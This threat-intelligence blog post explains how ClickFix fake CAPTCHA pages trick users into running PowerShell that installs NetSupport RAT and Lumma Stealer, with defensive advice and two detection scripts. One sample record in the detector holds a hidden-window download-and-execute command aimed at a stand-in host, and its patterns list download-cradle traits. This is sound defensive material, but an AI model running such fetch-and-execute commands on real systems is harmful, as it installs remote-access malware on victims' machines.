2025-02-11
Cybercriminals are constantly evolving their techniques to evade detection and compromise unsuspecting victims. One of the latest tactics observed in early 2025 is the ClickFix technique, which has been used to distribute a remote access trojan (RAT) known as NetSupport RAT. This malware, originally designed as a legitimate remote IT support tool, has been repurposed by attackers to gain full control over infected devices.
ClickFix leverages fake CAPTCHA pages to trick users into executing malicious PowerShell commands, ultimately leading to the download of NetSupport RAT. This technique has also been associated with distributing an updated Lumma Stealer variant, which uses advanced encryption to evade detection. These developments highlight a growing sophistication in cyber threats, making it more crucial than ever for organizations and individuals to stay vigilant against evolving attack vectors.
The Attack Chain
- Use of ClickFix: Attackers inject fake CAPTCHA pages into compromised websites.
- Deception Mechanism: Users are tricked into copying and executing PowerShell commands.
- Malware Deployment: These commands download and run NetSupport RAT from a remote server.
- Malicious Capabilities: The RAT grants attackers full control, including file transfer, keylogging, and remote execution of commands.
- Disguised Delivery: Malicious components are hidden within PNG image files to evade detection.
- Lumma Stealer Update: The same ClickFix method is also being used to distribute a modified version of Lumma Stealer, which now employs the ChaCha20 cipher to encrypt its configuration.
- Stealth & Evasion: The updated malware variants showcase enhanced anti-analysis mechanisms to bypass security solutions.
What Undercode Says: The Implications of ClickFix and NetSupport RAT Attacks
The Rise of CAPTCHA-Based Malware Delivery
CAPTCHA systems are widely used to distinguish humans from bots, which makes them a seemingly trustworthy mechanism. Cybercriminals leveraging ClickFix exploit this trust by injecting fake CAPTCHA pages, using social engineering to bypass user skepticism. Since CAPTCHA is a routine verification step on many websites, users may not hesitate to follow the instructions provided, which is what makes this attack so effective.
The Evolution of NetSupport RAT
Originally a legitimate remote support tool, NetSupport Manager was never intended for malicious purposes. However, its versatility and built-in remote control capabilities made it an attractive tool for cybercriminals. Unlike traditional malware, NetSupport RAT does not rely on exploiting system vulnerabilities; instead, it tricks users into unknowingly installing it. Once inside a system, it operates under the guise of a legitimate application, making detection more difficult.
Why PNG Files? The Hidden Payload Strategy
One of the more sophisticated aspects of this attack is the use of PNG image files to conceal malware components. This technique is part of a growing trend in which threat actors embed malicious code inside image files, leveraging steganography to bypass security tools. Because the file still looks like ordinary image data, traditional antivirus software is likely to treat it as harmless.
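As an added example, not code from the original post or the referenced report: a small PNG chunk walker showing what a structural check for hidden payloads can look at, namely non-standard chunk types, chunk CRC mismatches and bytes appended after IEND. It runs on a constructed minimal PNG and assumes the payload lives in the container rather than in the pixel values, which a structural check alone cannot detect.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification and its registered extensions.
STANDARD_CHUNKS = {"IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP",
                   "sBIT", "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs",
                   "sPLT", "tIME", "eXIf"}

def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def build_png(width: int = 1, height: int = 1) -> bytes:
    """Constructed sample: a valid 8-bit RGB PNG filled with black pixels."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")

def scan_png(blob: bytes) -> list:
    """Walk the chunk list and return human-readable structural anomalies."""
    if not blob.startswith(PNG_SIG):
        return ["missing PNG signature"]
    findings, pos = [], len(PNG_SIG)
    while pos + 8 <= len(blob):
        length = struct.unpack(">I", blob[pos:pos + 4])[0]
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        crc_bytes = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_bytes) < 4:
            return findings + [f"truncated chunk {ctype!r}"]
        name = ctype.decode("latin1")
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            findings.append(f"bad CRC on {name}")  # chunk body edited after it was written
        if name not in STANDARD_CHUNKS:             # private chunks are legal but worth a look
            findings.append(f"non-standard chunk {name} ({length} bytes)")
        pos += 12 + length
        if ctype == b"IEND":
            if len(blob) > pos:                     # decoders stop at IEND, so this is invisible
                findings.append(f"{len(blob) - pos} bytes after IEND")
            return findings
    return findings + ["no IEND chunk"]

if __name__ == "__main__":
    for finding in scan_png(build_png() + b"\x90" * 64):
        print("finding:", finding)
```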
The Link Between ClickFix and Lumma Stealer
In addition to NetSupport RAT, ClickFix is now being used to distribute an updated Lumma Stealer variant. The ChaCha20 cipher implementation in this new version indicates a shift towards more sophisticated encryption techniques, allowing attackers to better protect their command-and-control (C2) communications from interception.
Defensive Measures: How to Protect Against ClickFix-Based Attacks
To mitigate the risks associated with ClickFix and NetSupport RAT, organizations and users must adopt a multi-layered security approach:
- User Awareness & Training: Educate employees about social engineering tactics, including fake CAPTCHA pages.
- PowerShell Restrictions: Disable or restrict PowerShell execution for non-administrative users to prevent script-based attacks.
- Web Filtering & Domain Monitoring: Block access to suspicious or newly registered domains often used for malware distribution.
- Behavior-Based Threat Detection: Rely on behavioral analysis rather than signature-based detection to identify abnormal activity.
- Image File Analysis: Implement steganography detection tools to scan image files for hidden payloads.
- Endpoint Protection & Threat Intelligence: Deploy EDR solutions to detect unauthorized remote access attempts.
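As an added example serving both the attack chain described above and the behavior-based detection measure in this list (written for this page, not code from the original post or the referenced report): detection logic that flags the ClickFix execution pattern, a PowerShell process spawned by explorer.exe (the parent of anything pasted into the Run dialog) whose command line combines download-and-execute traits. The records are constructed in a Sysmon Event ID 1 style; the trait list is an assumption about what such lures typically contain, not a rule from any vendor.

```python
import re

# Constructed sample process-creation records in a Sysmon Event ID 1 style.
# Not real telemetry; example.invalid is a reserved, non-resolving name.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]

# A command pasted into the Run dialog or the File Explorer address bar is
# spawned by explorer.exe, so that parent marks a user-typed or user-pasted launch.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line traits of paste-and-run lures; one alone is weak, several together are not.
TRAITS = {
    "download cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I),
    "dynamic execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote URL": re.compile(r"https?://", re.I),
}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> list:
    """Traits matched by a PowerShell launch from an interactive parent, else []."""
    if basename(event["Image"]) not in SHELLS:
        return []
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(event["CommandLine"])]

def detect_clickfix(events: list, min_traits: int = 2) -> list:
    """Alert on launches that combine at least min_traits lure traits."""
    alerts = []
    for ev in events:
        traits = score_event(ev)
        if len(traits) >= min_traits:
            alerts.append({"CommandLine": ev["CommandLine"], "traits": traits})
    return alerts
```

Tune `min_traits` and the parent set to your environment; scripted administration launched by management agents (the second record) is deliberately left alone.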
Conclusion: The Future of CAPTCHA Exploits in Cybercrime
The emergence of ClickFix as a malware delivery mechanism signals a dangerous evolution in cyberattack strategies. By manipulating users into executing malicious commands under the guise of security verification, attackers are refining their social engineering playbook. Furthermore, the continued enhancement of Lumma Stealer and NetSupport RAT showcases an ongoing arms race between cybercriminals and security professionals.
As adversaries refine their evasion techniques, cybersecurity defenses must evolve in tandem. The increasing use of encryption, steganography, and deceptive delivery mechanisms will continue to challenge traditional security measures, making threat intelligence, proactive monitoring, and user awareness more critical than ever. 🚨
References:
Reported By: https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html